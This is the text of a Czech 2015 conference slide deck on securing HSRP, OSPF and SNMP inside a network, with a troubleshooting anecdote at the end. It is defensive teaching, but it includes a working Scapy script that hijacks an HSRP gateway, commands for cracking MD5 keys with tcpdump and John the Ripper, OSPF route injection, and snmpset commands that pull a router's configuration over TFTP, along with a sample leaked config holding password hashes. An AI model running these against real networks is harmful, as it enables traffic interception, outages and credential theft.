zabezpečení síťových protokolů

9. 5. 2015 1

Michal KostěnecCESNET, z. s. p. o.

Zabezpečení síťových protokolů

9. 5. 2015 2

Obsah● Úvod

– Význam bezpečnosti uvnitř sítě – Vnitřní vs vnější

● Zabezpečení protokolů uvnitř sítě– Krátce teorie o funkci protokolu– Dostupné druhy zabezpečení– Popis útoku– HSRP, OSPF a SNMP

● Zajímavost z praxe v 2014

9. 5. 2015 3

Bezpečnost uvnitř sítě● Složitější ochrana než před útoky z Internetu

– Povaha útoků se může lišit● Přibývá L2 komunikace

– Různé kategorie sítě● Klientské (portsecurity, DHCP snooping, DAI, IPSG,

storm-control)● Serverové (FW, FHRP, mgmt rozhraní)

– Neočekávané (nepříjemné) vlastnosti● OS● Síťových prvků

9. 5. 2015 4

HSRP● Rodina protokolů FHRP

– HSRP (Cisco proprietární), VRRP, GLBP

● Poskytují redundanci pro next-hop (def. gw)● Aktivní sledování stavu HSRP routeru

– Pravidelné HELLO zprávy

– Hello – 3s

– Hold-time – 10s

● V případě výpadku další router s nejvyšší prioritou převezme roli gw

● Virtuální IP a MAC

9. 5. 2015 5

HSRP fáze

9. 5. 2015 6

Použití HSRP● Nejčastěji v serverové podsíti

– Zajištění max redundance GW

– Bezvýpadková změna aktivního směrovače

– Podpora 2+ participujících směrovačů

– Možnost „load-balancingu“

● Méně časté v klientské síti– Sítě s vysokou prioritou

● Spojení 2 active/active párů– FW + směrovač

9. 5. 2015 7

Naše síť s HSRP

9. 5. 2015 8

HSRP & Cisco

9. 5. 2015 9

HSRP zprávy

9. 5. 2015 10

Druhy autentizace HSRP● Bez autentizace

– Výchozí stav

– Autentizační řetězec – cisco (viz hello paket)

● Plaintext autentizace– Vlastně žádná změna

– Není autentizace, pouze jako ochrana při chybné konfiguraci

● MD5 autentizace– Vytváří se HMAC zprávy

– Integrita obsahu a autenticita odesílatele

9. 5. 2015 11

Útok na HSRP

9. 5. 2015 12

Útok na HSRP● Vysíláme pravidelně pakety s parametry pro získání

pozice aktivního směrovače– Cíl je vyhrazená multicastová skupina

– Priorita 0-255, čili 255;-)

– Potenciálně vyšší IP než jsou „pravé“ směrovače

● MITM nebo DoS● Jaký je rozdíl mezi (na co si dávat pozor)

– Fyzicky v lokální síti

– Vzdáleně na kompromitovaném stroji

9. 5. 2015 13

Útok prakticky● Scapy

– Generování, dekódování a manipulace s pakety

ip = IP(src='10.10.10.101', dst='224.0.0.2')udp = UDP()hsrp = HSRP(group=10,

priority=255, virtualIP='10.10.10.1',auth='Vlan10!')

send(ip/udp/hsrp, iface='eth0', inter=3, loop=1)

>>> ip/udp/hsrp<IP frag=0 proto=udp src=10.10.10.101 dst=224.0.0.2 |<UDP sport=1985 dport=1985 |<HSRP priority=255 group=10 auth='Vlan10!' virtualIP=10.10.10.1 |>>>

9. 5. 2015 14

Co budeme dělat s MD5?● Útok identický, jen potřebujeme „klíč“

– Online Bruteforce

– Offline bruteforce

● Nahrání komunikace na lokální síti

● Vyparsování dat pro offline bruteforcing (MagnumRipper)

● Bruteforcing (JtR)

tcpdump -i eth0 -n dst host 224.0.0.2 -s0 -w /tmp/hsrp.pcap

pcap2john.py hsrp.pcap > hsrp.john

john hsrp.john

9. 5. 2015 15

HSRP summary● Používat MD5 autentizaci● Používat dostatečne silný(dlouhý) klíč● Případně použít ACL

– Pouze vyjmenované HSRP směrovače

ip access-list extended ACL_HSRP_ROUTER

permit udp host 10.10.10.3 eq 1985 any eq 1985

deny udp any eq 1985 any eq 1985 log

permit ip any any

9. 5. 2015 16

OSPFv2 (dále OSPF)● Open Shortest Path First● Nejpoužívanější dynamický směrovací protokol

– Hierarchické dělení sítě ● Oblasti (informace se vyměňují uvnitř oblasti, tzv.

area)● Hraniční směrovače pro výměnu zpráv mezi oblastmi

– Hello zprávy v krátkém intervalu (rychlá konvergence)

– Dijkstrův algoritmus (rychlost linky)

– Loadbalancing (cesty se stejnou „cenou“)

– Autentizace

9. 5. 2015 17

Druhy autentizace● Shodné jako u HSRP

– Jen se nedělá HMAC, ale pouze MD5 klíče

– Draft na SHA256 HMAC

● Bez autentizace– Výchozí stav

● Plaintext autentizace– Vlastně žádná změna

– Není autentizace, pouze jako ochrana při chybné konfiguraci

● MD5 autentizace

9. 5. 2015 18

(NE)Použití OSPF● Pro páteřní sítě s rychlou konvergencí

– Řádově jednotky sekund dle nastavení

– Robustní díky hierarchii

– Náročnější na CPU

● Klientské sítě– Není důvod, spíše chyba v konfiguraci

● Serverové sítě– Virtuální směrovače (CSR 1000V)

– Anycast DNS, ...

9. 5. 2015 19

Naše síť s OSPF

9. 5. 2015 20

OSPF podmínky sousedství● Musí se shodovat

– Síť a maska na lince

– Oblast (Area) + její typ

– Hello + Dead časy

– MTU (kontrolu lze vypnout)

– Autentizace

● Nesmí se shodovat– Router-id (označení směrovače)

9. 5. 2015 21

Route injection● Navázání sousedsví

– Problém při autentizaci

● MITM nebo DoS● Injektování routy

– Lokální síť (příliš složité)● PROČ?

– Vzdálená síť/IP● Např. 8.8.8.8

● Quagga Int Lo1Ip address 8.8.8.8 255.255.255.255

Router ospf 1Network 8.8.8.8 0.0.0.0 area 0

9. 5. 2015 22

Kde zjistíme potřebné parametry

9. 5. 2015 23

Ilustrace útoku na OSPF

9. 5. 2015 24

Útok na OSPF prakticky● Uvažujme kompromitaci serveru

– Do sítě jsou posílány HELLO zprávy pro DNS Anycast server

– Zjistíme potřebné parametry pro sousedství● Wireshark, tcpdump, tshark, …

– Navážeme sousedství

– Injektujeme routu● 0.0.0.0/0 je riskantní● Nejlépe /32

● Při použité autentizaci– Získání dat a bruteforce

9. 5. 2015 25

OSPF hello s autentizací

9. 5. 2015 26

OSPF s MD5 autentizací● Postup téměř identický jako u HSRP● Nahrání komunikace na lokální síti

● Vyparsování dat pro offline bruteforcing (ettercap > v0.8.1)

● Bruteforcing (JtR)

tcpdump -i eth0 -n dst host 224.0.0.5 -s0 -w /tmp/ospf.pcap

ettercap -Tqr ospf.pcap > ospf.john

john ospf.john

9. 5. 2015 27

OSPF summary● Používat MD5 autentizaci● Používat dostatečne silný(dlouhý) klíč● Passive-interface default

– No passive-interface Vlan10

● Sousedé explicitně přes unicast● Filtrování přijímaných prefixů

ip prefix-list DNS_ANYCAST_IN seq 5 permit 10.3.3.3/32

router ospf 1distribute-list prefix DNS_ANYCAST_IN in Vlan10

9. 5. 2015 28

SNMP● Simple Network Management Protocol● Základní protokol pro dohled/správu sítě● Základní pojmy

– Manager (Server)● GET/SET požadavky (RO vs RW community)

– Agent (SW na zařízení)● GET/SET odpovědi● TRAPy (nevyžádané SNMP zprávy)

– „Community“● Lze chápat jako heslo (pouze v1 - v2c)

● Hierarchický jménný systém OID– Pro snadnější práci MIB tabulky

9. 5. 2015 29

MIB tabulka

9. 5. 2015 30

SNMP II.● Verze 1

– původní verze

– Nepodporuje 64bit čítače

● Verze 2c– Nové metody pro čtení dat

– Autentizace jen dle „community“

– Nejpoužívanější v součastnosti

● Verze 3– Autentizace a šifrování

9. 5. 2015 31

Cisco konfigurace SNMP

snmp-server community $emestralk4. RO snmp-server community read.write!C0mmunity RWsnmp-server trap-source Loopback0snmp-server location NTK, Velky sal - XX,XX420snmp-server contact Michal Kostenec, kostenec@test.lab,

+420 111 222 333snmp-server host 10.50.10.3 webtrapsnmp-server enable traps cpu threshold

9. 5. 2015 32

Průzkum prostředí při RO● Hledání zranitelností

– Neoprávněný přístup

– Eskalace práv

– DoS

iso.3.6.1.2.1.1.1.0 = STRING: "Cisco IOS Software, C3900 Software (C3900-UNIVERSALK9-M), 15.2(4)M5, RELEASE SOFTWARE (fc2)“

CVE-2014-3359

An attacker could exploit this vulnerability by sending malformed DHCPv6 packets to be processed by an affected device. An exploit could allow the attacker to cause a memory leak and eventual reload of an affected device.

9. 5. 2015 33

Průzkum prostředí při RO● Zjišťování topologie sítě

– Popis portů

– Vlany

– Připojená zařízení

iso.3.6.1.2.1.31.1.1.1.18.10008 = STRING: "SWT Testovaci podsit“iso.3.6.1.2.1.31.1.1.1.1.10008 = STRING: "Fa0/8"iso.3.6.1.4.1.9.9.68.1.2.2.1.2.10008 = INTEGER: 10iso.3.6.1.2.1.17.1.4.1.2.9 = INTEGER: 10008iso.1.3.6.1.2.1.17.4.3.1.2.0.0.12.7.172.8 = 9iso.3.6.1.2.1.17.4.3.1.1.0.0.12.7.172.8 = Hex-STRING: 00 00 0C 07 AC 08iso.3.6.1.2.1.4.22.1.2.430.10.10.101.10 = Hex-STRING: 00 00 0C 07 AC 08

9. 5. 2015 34

Zajímavosti při RW community● Možnost nastavení položky s možností zápisu● Stažení konfigurace :-)

– Hesla, sdílená tajemství, další zajímavá konfigurace

snmpset -c community -v 2c 10.10.10.2 1.3.6.1.4.1.9.9.96.1.1.1.1.2.336 i 1 (tftp)snmpset -c community -v 2c 10.10.10.2 1.3.6.1.4.1.9.9.96.1.1.1.1.3.336 i 4 (runningConfig)snmpset -c community -v 2c 10.10.10.2 1.3.6.1.4.1.9.9.96.1.1.1.1.4.336 i 1 (networkFile)snmpset -c community -v 2c 10.10.10.2 1.3.6.1.4.1.9.9.96.1.1.1.1.5.336 a 10.10.10.101 (dstIP)snmpset -c community -v 2c 10.10.10.2 1.3.6.1.4.1.9.9.96.1.1.1.1.6.336 s R1-config.conf (filename)snmpset -c community -v 2c 10.10.10.2 1.3.6.1.4.1.9.9.96.1.1.1.1.14.336 i 1 (active)

9. 5. 2015 35

Stažená konfigurace

enable secret 4 xPC5koYEZRbDek6EF24RmwY.I8z87NNt7erVl7DxBH.username admin privilege 15 secret 5 $1$lVFH$x7vloxy4oaT9jvrNt0jGn/

aaa group server tacacs+ tac_admin server 10.100.1.20 server 10.200.1.20

tacacs-server key 7 25010A3C560F3C067C1C16174115

archive path tftp://10.100.1.13/backup/sw101-config

line con 0 password 7 06025C2B41171D49line vty 0 4 access-class management-access-v4 in password 0 SuperTajneHeslo.908

ip access-list standard management-access-v4 permit 10.99.1.0 0.0.0.255 permit 10.100.1.0 0.0.0.255

9. 5. 2015 36

Summary SNMP● Nejvhodnější je v3 (autentizace, šifrování)

– Používá se spíše v2

● „Community“, které nelze uhádnout hrubou silou● Nepoužívat RW „community“, pokud není nutné● Omezit přístup na vyjmenované IP rozsahy

ip access-list standard management-access-v4 permit 10.99.1.0 0.0.0.255 deny any log

snmp-server community $emestralk4. RO management-access-v4

9. 5. 2015 37

Praxe 2014: Duplicitní IP● Tiskárna a posléze WIN hlásí duplicitní IP● Řízený přístup k síti

– Pouze registrovaná zařízení (DHCP)

– DHCP snooping, DAI, IPSG

● Problém na různých VLANách

9. 5. 2015 38

Praxe 2014: Duplicitní IP● Nová úžasná funkce

– IP Device Tracking (IPDT)

– The main IPDT task is to keep track of connected hosts (association of MAC and IP address). In order to do this, it sends unicast Address Resolution Protocol (ARP) probes with a default interval of 30 seconds

● Použití

– Web-based authentication

– Auth-proxy

– Flexible netflow

– Cisco TrustSec (CTS)

– ...

9. 5. 2015 39

Praxe 2014: Duplicitní IP

show ip device tracking all

IP Device Tracking = EnabledIP Device Tracking Probe Count = 3IP Device Tracking Probe Interval = 30IP Device Tracking Probe Delay Interval = 0------------------------------------------------------------IP Address MAC Address Vlan Interface STATE------------------------------------------------------------10.10.0.20 a820.661b.b384 10 GigabitEthernet0/1 INACTIVE

9. 5. 2015 40

Dotazy

???